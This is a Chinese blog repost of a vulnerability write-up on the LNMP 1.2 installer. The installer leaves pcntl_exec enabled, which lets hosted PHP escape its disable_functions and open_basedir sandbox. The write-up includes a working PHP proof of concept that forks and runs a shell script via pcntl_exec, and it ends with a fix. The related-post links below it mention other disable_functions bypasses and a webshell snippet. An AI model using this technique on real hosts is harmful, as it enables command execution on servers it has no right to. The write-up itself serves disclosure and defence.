转:LNMP虚拟主机PHP沙盒绕过/命令执行(php exec命令被禁之后)

最新推荐文章于 2022-10-11 19:28:57 发布
最新推荐文章于 2022-10-11 19:28:57 发布
阅读量113 收藏
点赞数
文章标签: php 数据库 操作系统
原文链接:http://www.cnblogs.com/studyskill/p/8946971.html
版权

LNMP虚拟主机PHP沙盒绕过/命令执行

lnmp更新1.2版本,很多东西都升级了,很棒。不过还是发现一个BUG。

LNMP是一款linux下nginx、php、mysql一键安装包。

下载:http://soft.vpser.net/lnmp/lnmp1.2.tar.gz

执行一个命令即可简单安装。

漏洞详情

LNMP是这样配置沙盒的:

  1. disable_functions,配置在 include/php.sh中:

php_sh_—_lnmp1_2.png

其值为:

1
passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket
  1. open_basedir,在创建虚拟主机的时候配置:

lnmp_—_lnmp1_2.png

如上图,方法是在虚拟主机跟目录里,新建一个.user.ini文件,并通过这个ini设置open_basedir,并用chattr +i赋予其不可修改的权限。

但如果php可以执行系统命令的话,open_basedir也没什么意义了。

我们看看编译php的选项:

php_sh_—_lnmp1_2 2.png

可见开启了PHP默认不开启的pcntl:–enable-pcntl。

我们看前面,pcntl_exec是没有被禁用了。不知道为什么,这个版本把pcntl_exec的禁用给去掉了,这就导致了虚拟主机的沙盒绕过、命令执行。

给出pcntl_exec执行命令的方法。

pcntl_exec是类似windows下的shell.application。需要我们先写一个脚本文件,然后用其执行。

POC如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
header( "Content-Type: text/plain");
$cmd="/tmp/exec";
@unlink( $cmd);
@unlink( "/tmp/output");
$c = "#!/usr/bin/env bash\nuname -a > /tmp/output\n";
file_put_contents( $cmd, $c);
chmod( $cmd, 0777);
 
switch (pcntl_fork()) {
case 0:
$ret = pcntl_exec($cmd);
exit("case 0");
default:
echo "case 1";
break;
}

写一个脚本,执行命令后把结果输出到/tmp/output。

然后用pcntl_fork(),fork出一个子进程,在子进程里调用pcntl_exec执行这个脚本。否则在父进程里执行pcntl_exec后会导致进程一直处在等待状态,最后导致502。

https___www_leavesongs_com_ph_php.png

然后查看output,echo file_get_contents("/tmp/output");

https___www_leavesongs_com_output_txt 2.png

执行任意命令沙盒bypass,虚拟主机也就没什么意义了。

解决方案

禁用pcntl_exec,或者不要–enable-pcntl

转载于:https://www.cnblogs.com/studyskill/p/8946971.html

bill_live
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 893
在CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
php沙盒绕过,GhostScript 沙箱绕过命令执行)漏洞(CVE-2018-19475)
weixin_30317869的博客
03-21 229
POST /index.php HTTP/1.1Host: targetAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: close...
傻眼了,我粗略造了一个命令执行绕过方法居然被同事嫖走了
kali_Ma的博客
07-15 276
目录x00 前言0x01 常见的命令执行函数0x02 常见命令分隔符、终止符和截断符号1、命令分隔符2、命令终止符3、截断符号0x03 命令执行绕过1、disable_function1.ld_preload3.利用pcntl_exec函数2、绕过过滤字符1.空格绕过2.黑名单绕过(1)拼接(3)利用已存在资源(4)单引号、双引号绕过3.文件读取绕过4.通配符绕过 x00 前言 我偷偷总结了一下命令执行绕过方法,不小心被同事看到了,然后他就给“借”走了。。 这里简单归纳总结一下: 0x01 常见的命令执行
命令执行各种绕过总结
m0_64815693的博客
10-11 8765
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
如何在ctf解题实战中绕过disable_function
qq_47168481的博客
01-30 7011
本文介绍将介绍ctf比赛中遇到的三种绕过disable_function的方法
分布式构建运维 • Nginx服务部署:代理服务器 • PHP环境:编程语言 • Linux:LNMP+wordpress
07-19
• Nginx服务部署:代理服务器 • PHP环境:编程语言 • Linux:LNMP+wordpress • LNMP:L是指Linux,N是指Night,M是指MySQL,P是指PHP • wordpress:个人博客系统,也可以当作内容管理系统来使用
lnmpcheck:lnmp环境检测工具,检测linux,nginx,php,mysql的各种问题
06-24
通过运行lnmpcheck脚本,就可以将lnmp环境中的各种问题报告出来,如磁盘满了、cpu负载过高、磁盘IO过高、网络出现了问题、遭遇了synflood攻击、php进程hang在了某个地方等等,甚至还会检查nginx日志文件是否有异常。...
docker-lnmp:Docker lnmp镜像,LinuxNginx(alpine)Mysql8.0PHP7.2Redis4.0
04-29
功能支持PHP多版本切换(5.4/5.6/7.2)Mysql映射到宿主机目录docker-lnmp/mysql支持mysql/nginx/php日志站点配置见docker-lnmp/conf/conf.d支持脚本定时备份mysql数据库、定时删除旧的备份2. 使用说明更新系统:yum -...
docker-lnmp:使用docker部署lnmp(Linux,Nginx,MySQL,PHP7)
02-01
PHPPHP-FPM放入PHP-FPM容器中,它从主机检索php脚本,进行解释,执行然后对Nginx进行响应。 如有必要,它将也连接到MySQL 。 MySQL位于MySQL容器中, 我们的应用程序脚本位于主机上,您可以直接编辑文件,而...
基于PHP的vhcs开源的虚拟主机管理系统v2.4.7.1源码.zip
最新发布
08-29
PHP虚拟主机管理系统 vhcs v2.4.7.1】是开源的Web服务器管理解决方案,专为管理和分配基于PHP虚拟主机而设计。这款系统允许管理员轻松地创建、管理和维护多个用户账户,每个账户可以拥有独立的域名、FTP访问、...
php沙盒绕过ctf,CTF SSTI(服务器模板注入)
weixin_33124479的博客
04-09 782
基本判断 渲染模板flask/jinjaflask SSTI的基本思路就是利用python中的魔术方法找到自己要用的函数__dict__ 保存类实例或对象实例的属性变量键值对字典__class__ 返回类型所属的对象__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。__bases__ 返回该对象所继承的基类// __base__和__mro__都是用来寻...
利用pcntl_exec突破disable_functions
收集盒 Book box
04-20 2590
1、说明     pcntl是linux下的一个扩展,可以支持php的多线程操作。     pcntl_exec函数的作用是在当前进程空间执行指定程序,版本要求:PHP 4 >= 4.2.0, PHP 5 2、利用     在做渗透的时候被disable_functions卡住不能执行命令是家常便饭,今天在一国外虚拟主机上又被卡了,但我在执行phpinfo();的时候眼前闪过–enable
命令执行漏洞的利用以及绕过方式
cosmoslin的博客
09-14 1951
命令执行漏洞的利用以及绕过方式 1 preg_match()函数 preg_match 函数用于执行一个正则表达式匹配。 int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) 参数 说明 $pattern 要搜索的模式,字符串形式 $subject 要搜索检测的目标字符串 $matches 如果提供了参数
[投稿]Webshell下命令执行限制及绕过方法
Coisini的博客
06-23 4078
0x00 前言 上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御. 0x01 php webshell执行命令原理 php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下 搜索关键字定位到以下代码 function execute($cfe) { $re...
一次项目中Thinkphp绕过禁用函数的实战记录
菜鸟教程
03-23 1327
更多python教程请到友情连接: 菜鸟教程https://www.piaodoo.com 茂名一技http://www.enechn.comppt制作教程步骤 http://www.tpyjn.cn 兴化论坛http://www.yimoge.cn 电白论坛 http://www.fcdzs.com 目录前言file_put_contents pcntl_exec LD_PRELOAD 劫持 总结前言 在一次渗透测试中,手工找了许久没发现什么东西,抱着尝试的心情打开了xray 果然xray还是挺给力
PHP Webshell下绕过disable_function的方法
weixin_43999372的博客
11-07 1235
一 系统组件绕过 1.window com组件(php 5.4)(高版本扩展要自己添加) 条件:要在php.ini中开启(如图) 利用代码 &amp;amp;amp;amp;amp;lt;?php $command=$_GET['a']; $wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能 $exec = $wsh-&amp;amp;amp;amp;amp;gt;exec(&amp;amp
PHP绕过disable_function限制
BerL1n
09-24 4932
前言 之前对php中的这个disable_function没什么了解,不过通过国赛决赛中的一道题引起了注意,因为在对基本上所有的shell命令禁用之后必须想办法突破disable_function才行,这里学习几种突破disable_function的方法。 LD_PRELOAD环境变量突破 LD_PRELOAD是Linux系统的下一个有趣的环境变量:“它允许你定义在程序运行前优先加载的动态链接库...
PHP利用pcntl_exec突破disable_functions
weixin_30595035的博客
08-18 250
http://fuck.0day5.com/?p=563 PHP突破Disable_functions执行Linux命令 利用dl函数突破disable_functions执行命令 http://www.xfocus.net/articles/200704/915.html 编写PHP扩展三步曲 http://blog.csdn.net/taft/article/det...
Windows与Linux平台服务搭建详解:Apache+PHP+MySQL与LAMP/LNMP
在本次实训中,我们将深入探讨在Windows平台下搭建Apache、PHP和MySQL服务的过程,以及在Linux平台(通过LAMP或LNMP架构)上的相似操作。首先,了解全球Web服务器市场,尤其是Apache和Nginx的崛起,对于掌握Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值